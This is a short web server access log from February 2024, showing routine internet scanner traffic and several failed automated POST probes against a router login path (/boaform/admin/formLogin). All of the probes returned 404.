103.149.192.241 - - [05/Feb/2024:03:43:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
45.128.232.191 - - [05/Feb/2024:03:44:59 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.97.210.229 - - [05/Feb/2024:03:45:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.87.56.168 - - [05/Feb/2024:03:47:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
45.128.232.191 - - [05/Feb/2024:03:48:19 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
71.6.232.26 - - [05/Feb/2024:03:51:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
69.164.217.74 - - [05/Feb/2024:03:53:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [05/Feb/2024:03:54:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.156.128.32 - - [05/Feb/2024:03:54:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
176.97.210.231 - - [05/Feb/2024:03:55:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [05/Feb/2024:03:55:32 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
89.190.156.234 - - [05/Feb/2024:04:00:06 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
146.19.24.23 - - [05/Feb/2024:04:00:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.74.56.46 - - [05/Feb/2024:04:01:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.74.56.46 - - [05/Feb/2024:04:02:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.51 - - [05/Feb/2024:04:03:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.139.104.10 - - [05/Feb/2024:04:04:02 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
198.74.56.46 - - [05/Feb/2024:04:06:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.168.172 - - [05/Feb/2024:04:06:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.163.53 - - [05/Feb/2024:04:07:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.172.21 - - [05/Feb/2024:04:07:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.172.21 - - [05/Feb/2024:04:08:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
146.19.24.23 - - [05/Feb/2024:04:08:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [05/Feb/2024:04:12:17 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
